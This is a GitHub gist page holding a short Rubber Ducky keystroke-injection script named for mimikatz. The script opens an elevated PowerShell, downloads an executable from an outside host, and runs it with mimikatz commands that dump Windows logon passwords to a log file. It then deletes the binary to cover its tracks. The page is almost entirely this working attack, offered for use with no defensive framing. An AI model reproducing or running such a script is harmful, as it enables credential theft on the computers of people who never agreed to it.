Skip to content

Instantly share code, notes, and snippets.

@Creased

Creased/mimikatz.duck

Last active August 7, 2017 19:44
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Creased/4891e39bbbfed8da9d0d9f3c89104f33 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Creased/4891e39bbbfed8da9d0d9f3c89104f33 to your computer and use it in GitHub Desktop.
Download ZIP
Mimikatz Rubber Ducky script
Raw
mimikatz.duck
GUI r
DELAY 500
STRING powershell.exe Start-Process powershell.exe -Verb RunAs
ENTER
DELAY 1500
STRING $Payload = Get-Random
ENTER
STRING Start-BitsTransfer -Source https://go.bmoine.fr/mk -Destination C:\$Payload.exe
ENTER
DELAY 1500
STRING & C:\$Payload.exe "log C:\tmp.log" "privilege::debug" "sekurlsa::logonPasswords" "exit"
ENTER
STRING Remove-Item C:\$Payload.exe
ENTER
STRING exit
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment